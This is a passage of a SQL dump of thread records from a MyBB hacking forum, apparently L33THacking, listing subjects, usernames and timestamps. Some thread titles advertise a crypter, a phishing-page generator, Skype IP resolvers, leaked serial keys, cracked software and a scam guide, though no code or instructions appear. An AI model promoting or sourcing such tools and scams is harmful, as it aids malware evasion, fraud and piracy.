`visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('720', '16', 'How to find Serial/PID', '0', '0', '0', '214', 'Rave™', '1349542771', '3647', '1349542771', 'Rave™', '214', '4', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('721', '16', 'Microphone', '0', '0', '0', '214', 'Rave™', '1349542822', '3648', '1349542822', 'Rave™', '214', '3', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('722', '16', 'Plantronics GameCom 780 Surround Sound Gaming Headset', '0', '0', '0', '214', 'Rave™', '1349542879', '3649', '1349542879', 'Rave™', '214', '7', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('723', '16', 'iFrogs', '0', '0', '0', '214', 'Rave™', '1349542930', '3650', '1349542930', 'Rave™', '214', '4', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('724', '74', 'Cheese Cake Client', '0', '0', '0', '214', 'Rave™', '1349543370', '3651', '1350113789', 'XxTREYZxX', '257', '26', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('725', '7', 'L33THacking Cloudflare Resolver!', '0', '0', '0', '214', 'Rave™', '1349543426', '3652', '1349620732', 'iTzIpod', '82', '20', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('726', '13', 'Dorks', '0', '0', '0', '214', 'Rave™', '1349543495', '3653', '1350118986', 'PiXEL^OG', '258', '17', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('727', '35', 'Rate My Thread Design + Download', '0', '0', '0', '214', 'Rave™', '1349543534', '3654', '1349563047', 'mothered', '205', '19', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('728', '8', '[Sick Heavy] My first Dubstep Album [Sick Heavy]', '0', '0', '0', '214', 'Rave™', '1349543956', '3655', '1349543956', 'Rave™', '214', '8', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('729', '7', 'Skype Virus [MUST READ!]', '0', '0', '0', '3', '??????????¢™', '1349545873', '3657', '1350339948', '??????????¢™', '3', '53', '16', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('731', '3', 'PIDs for normal or upgraded?', '0', '0', '0', '9', 'p420', '1349552972', '3699', '1349570198', 't3h jok3r', '1', '10', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('732', '7', 'Congratz iTzIpod', '0', '0', '0', '5', 'Timmy', '1349555063', '3709', '1349567466', 'iTzIpod', '82', '20', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('733', '19', '[Junk]Who is [removed] out here?', '0', '0', '0', '1', 't3h jok3r', '1349556171', '3712', '1349559741', 'NXK', '61', '12', '2', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('734', '3', 'Downtime, PMs and Members', '0', '0', '0', '1', 't3h jok3r', '1349582977', '3733', '1349824286', 'The Anarchist', '246', '99', '21', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('735', '59', 'Ultimate Bitcoin Guide! Earn for playing games & More!', '0', '0', '0', '1', 't3h jok3r', '1349586132', '3735', '1349620489', 'iTzIpod', '82', '9', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('742', '59', 'The Code Book: How to Make It, Break It, Hack It, Crack It', '0', '0', '0', '213', 'BitMonst3r', '1349619405', '3771', '1349619405', 'BitMonst3r', '213', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('736', '7', 'Should I make a l33thacking Skype resolver?', '0', '0', '0', '214', 'Rave™', '1349608570', '3744', '1349633565', 't3h jok3r', '1', '15', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('737', '7', 'Just voted', '0', '6', '0', '214', 'Rave™', '1349608733', '3746', '1349693996', 'mothered', '205', '18', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('738', '43', '[LEAK] AVG 2013 Serial Keys', '0', '0', '0', '100', '??zg???g????61', '1349616554', '3760', '1349824446', '??zg???g????61', '100', '14', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('739', '59', '? $400+/DAY ! Ultimate E-Whoring Guide ?', '0', '0', '0', '213', 'BitMonst3r', '1349616888', '3762', '1349619460', 'BitMonst3r', '213', '7', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('740', '3', 'I am only one who gets this error?', '0', '0', '0', '213', 'BitMonst3r', '1349617212', '3763', '1349633391', 't3h jok3r', '1', '31', '5', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('741', '9', '7 Videos That Will Show You How To Make Real Income Online!', '0', '0', '0', '213', 'BitMonst3r', '1349618884', '3766', '1349758717', 'BitMonst3r', '213', '10', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('743', '23', 'I got a virus', '0', '0', '0', '82', 'iTzIpod', '1349641472', '3792', '1349703619', 'iTzIpod', '82', '13', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('744', '19', '[Junk]Site Purchased', '0', '0', '0', '243', 'Anarchy $ucks', '1349642114', '3793', '1349649205', 't3h jok3r', '1', '107', '9', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('750', '3', 'Leaving', '0', '0', '0', '82', 'iTzIpod', '1349653476', '3828', '1349693290', 'mothered', '205', '25', '5', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('745', '59', '[Leak] Huge Folder of Ebooks', '0', '0', '0', '100', '??zg???g????61', '1349645213', '3798', '1349798076', '??zg???g????61', '100', '10', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('746', '19', '[Junk]L33thacking wtf.....', '0', '0', '0', '222', 'Exposé', '1349645531', '3801', '1349652135', 't3h jok3r', '1', '23', '8', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('747', '3', 'L33THACKING WAS NEVER SOLD!', '0', '0', '0', '1', 't3h jok3r', '1349649678', '3809', '1349824722', 'The Anarchist', '246', '408', '57', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('749', '4', 'It\'s BreShiE!', '0', '0', '0', '232', 'BreShiE', '1349652059', '3822', '1349975765', '??zg???g????61', '100', '59', '16', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('748', '19', '[Junk][Junk][Junk]What the fuck is going on right now?', '0', '0', '0', '61', 'NXK', '1349651963', '3821', '1349652149', 'NXK', '61', '10', '2', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('751', '19', '[Junk]Regarding L33tforums.net', '0', '0', '0', '243', 'Anarchy $ucks', '1349654543', '3834', '1349654599', 't3h jok3r', '1', '4', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('752', '19', '[Junk]t3h jok3r is a scammer', '0', '0', '0', '243', 'Anarchy $ucks', '1349654582', '3835', '1349654609', 't3h jok3r', '1', '1', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('753', '19', '[Junk]Your site owner', '0', '0', '0', '243', 'Anarchy $ucks', '1349654724', '3838', '1349655068', 't3h jok3r', '1', '2', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('754', '19', '[Junk]Your Site Owner', '0', '0', '0', '243', 'Anarchy $ucks', '1349654755', '3839', '1349655068', 't3h jok3r', '1', '2', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('755', '19', '[Junk]Site Owner', '0', '0', '0', '243', 'Anarchy $ucks', '1349655220', '3845', '1349655277', 't3h jok3r', '1', '3', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('757', '19', '[Junk]Site Owner', '0', '0', '0', '243', 'Anarchy $ucks', '1349656973', '3855', '1349657928', 't3h jok3r', '1', '3', '2', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('756', '19', '[Junk]Site Owner', '0', '0', '0', '243', 'Anarchy $ucks', '1349656077', '3851', '1349657941', 't3h jok3r', '1', '7', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('759', '7', 'Join the LH Skype Group!', '0', '0', '0', '214', 'Rave™', '1349658994', '3871', '1349810820', 'Exposé', '222', '42', '11', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('758', '19', '[Junk]Site Owner', '0', '0', '0', '243', 'Anarchy $ucks', '1349658942', '3869', '1349661285', 't3h jok3r', '1', '4', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('760', '19', '[Junk]The Site Owner', '0', '0', '0', '243', 'Anarchy $ucks', '1349659096', '3872', '1349661285', 't3h jok3r', '1', '9', '4', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('761', '52', 'wTools | Host To IP | Geo-IP | CloudFlare Resolver | AIO Skype Tools', '0', '0', '0', '232', 'BreShiE', '1349661078', '3882', '1349661078', 'BreShiE', '232', '13', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('762', '58', 'LH Coders: Official Group - Applications: OPEN', '0', '0', '0', '232', 'BreShiE', '1349666395', '3889', '1350202245', 'spacefish36', '8', '75', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('763', '58', '[Announcement]Group Changes', '0', '0', '0', '61', 'NXK', '1349667886', '3891', '1349769715', 'R?????zo?', '62', '54', '11', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('764', '15', 'Hack Pack By Timmy | 2GB |', '0', '0', '0', '5', 'Timmy', '1349671302', '3895', '1350101902', 't3h jok3r', '1', '38', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('765', '46', 'Vulcan Private Pisher Generator', '0', '0', '0', '7', 'Romdu62', '1349671864', '3901', '1352353831', 'XxTREYZxX', '257', '32', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('766', '20', '[3/14] War - Crypter [ScanTime] by cris', '0', '0', '0', '7', 'Romdu62', '1349672344', '3902', '1352521603', 'Timmy', '5', '6', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('767', '74', 'Do you cheat/hack games?', '0', '0', '3', '53', 'sirchamp', '1349702535', '3913', '1350113703', 'XxTREYZxX', '257', '29', '9', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('776', '16', 'What are some things you want SE\'d?', '0', '0', '0', '222', 'Exposé', '1349758573', '4012', '1349945714', 'R?????zo?', '62', '20', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('768', '19', '[Junk]Site Owner 00', '0', '0', '0', '243', 'Anarchy $ucks', '1349714744', '3931', '1349719237', 't3h jok3r', '1', '5', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('769', '23', 'Math Tools for all Subjects Cracked by Rave', '0', '0', '0', '214', 'Rave™', '1349727396', '3944', '1349921767', 'swa4567', '10', '10', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('774', '19', '[Junk]What is expected of you!', '0', '0', '0', '222', 'Exposé', '1349750481', '3992', '1350705866', 't3h jok3r', '1', '16', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('770', '19', '[Junk]Gyzano JDB', '0', '0', '0', '214', 'Rave™', '1349727499', '3945', '1352011253', 't3h jok3r', '1', '17', '2', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('771', '15', 'Skype Resolver Source', '0', '0', '0', '214', 'Rave™', '1349727619', '3946', '1349727619', 'Rave™', '214', '22', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('772', '58', 'Group Request', '0', '0', '0', '214', 'Rave™', '1349727750', '3947', '1350004591', 'Romdu62', '7', '39', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('773', '9', 'Easy Money, Little Effort', '0', '0', '0', '241', 'Constrain', '1349731685', '3960', '1349731685', 'Constrain', '241', '17', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('775', '75', 'GTA San Andreas Cheats', '0', '0', '0', '4', 'Triple H', '1349752103', '3997', '1350562653', 'mothered', '205', '11', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, 